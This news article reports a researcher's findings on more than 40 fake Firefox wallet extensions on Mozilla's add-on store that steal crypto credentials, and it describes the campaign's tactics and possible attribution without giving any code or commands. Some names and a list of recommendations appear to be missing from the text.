There’s a new malware in the Web3 world that is targeting crypto users through fake Firefox extensions, and the threat is far from over. , in his latest Medium post, has revealed that there’s a large-scale, ongoing operation involving over 40 malicious Firefox extensions that impersonate popular cryptocurrency wallet tools. Obviously, the aim is to steal users’ private wallet credentials and exfiltrate them to remote attacker-controlled servers, leaving crypto assets wide open to theft.

As always, the malicious extensions were designed to mimic official wallets from major platforms like and more. Interestingly, they used real branding, logos, and even open-source code from the legitimate tools they impersonated. The result was a convincing trap: fully functional extensions that quietly looted user secrets behind the scenes.

What makes this campaign particularly dangerous is how deeply it has embedded itself in trusted spaces. These fake extensions weren’t lurking in sketchy corners of the internet; they were live on Mozilla’s official Firefox Add-ons store, complete with glowing reviews and inflated ratings to boost credibility.

In fact, many had hundreds of 5-star reviews, carefully crafted to fake popularity and trust. According to Ronen, the campaign has been active since at least April 2025, with some extensions uploaded as recently as last week. The persistence of uploads suggests that the threat actors are actively maintaining and evolving the campaign even now.

The extensions are engineered to extract wallet credentials directly from targeted web pages and send them to a remote server. They also transmit the victim’s external IP address, likely for profiling or geographic targeting.

While attribution is not definitive, early clues point to a Russian-speaking threat actor. Researchers discovered Russian-language comments in the code, as well as suspicious metadata linked to Russian-language files found on associated servers.

The attackers’ tactics also hint at a level of operational discipline: low-effort cloning of open-source code, selective insertion of malicious logic, and continued use of the Mozilla store’s trust systems to evade detection. 

With such threats hiding in plain sight, Ronen and his team at Koi Security recommend treating browser extensions with the same caution as full-fledged software: 

As the browser becomes an increasingly critical attack vector, especially for crypto users, the old habit of blindly trusting extensions is proving costly. The hope, Ronen says, is that greater awareness and better tooling will mark the beginning of the end for ungoverned third-party code.

Want these stories as they happen?